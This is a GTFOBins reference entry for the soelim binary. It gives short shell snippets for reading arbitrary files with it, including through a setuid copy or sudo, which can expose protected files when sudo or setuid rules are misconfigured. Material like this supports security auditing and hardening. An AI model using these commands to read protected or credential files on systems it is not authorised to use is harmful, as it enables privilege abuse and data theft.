GTFOBins.github.io/_gtfobins/soelim.md

17 lines
373 B
Markdown
Raw Normal View History

2020-03-17 06:19:10 +00:00
---
description: The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.
functions:
file-read:
- code: |
LFILE=file_to_read
soelim "$LFILE"
suid:
- code: |
LFILE=file_to_read
./soelim "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo soelim "$LFILE"
---